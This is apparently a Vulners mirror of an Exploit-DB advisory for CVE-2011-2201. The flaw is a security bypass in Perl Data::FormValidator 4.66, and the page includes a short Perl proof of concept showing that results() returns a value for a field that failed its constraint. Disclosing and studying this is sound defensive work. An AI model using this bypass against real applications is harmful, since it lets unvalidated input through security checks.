Lucene search
+L

Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass

🗓️ 08 Jun 2011 00:00:00Reported by dstType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 21 Views

Perl Data::FormValidator 4.66 'results()' Security Bypass vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2011-2201
8 Jun 201100:00
circl
cve
CVE
CVE-2011-2201
14 Sep 201115:00
cve
cvelist
Cvelist
CVE-2011-2201
14 Sep 201115:00
cvelist
debiancve
Debian CVE
CVE-2011-2201
14 Sep 201115:00
debiancve
euvd
EUVD
EUVD-2011-2191
7 Oct 202500:30
euvd
fedora
Fedora
[SECURITY] Fedora 14 Update: perl-Data-FormValidator-4.66-6.fc14
8 Sep 201107:00
fedora
fedora
Fedora
[SECURITY] Fedora 15 Update: perl-Data-FormValidator-4.66-6.fc15
8 Sep 201106:59
fedora
fedora
Fedora
[SECURITY] Fedora 16 Update: perl-Data-FormValidator-4.66-6.fc16
7 Sep 201103:41
fedora
nessus
Tenable Nessus
Fedora 16 : perl-Data-FormValidator-4.66-6.fc16 (2011-11680)
7 Sep 201100:00
nessus
nessus
Tenable Nessus
Fedora 15 : perl-Data-FormValidator-4.66-6.fc15 (2011-11756)
9 Sep 201100:00
nessus
Rows per page
source: https://www.securityfocus.com/bid/48167/info

The Perl Data::FormValidator module is prone to a security-bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.

Data::FormValidator 4.66 is vulnerable; other versions may also be affected.

#!/opt/perl/5.12/bin/perl

use strict;
use warnings;

use Data::FormValidator;

"some_unrelated_string" =~ m/^.*$/;

my $profile = {
untaint_all_constraints => 1,
required => [qw(a)],
constraint_methods => {
a => qr/will_never_match/,
},
};

my $results = Data::FormValidator->check({ a => 1 }, $profile);
warn $results->valid('a');

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jan 2015 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.06901
21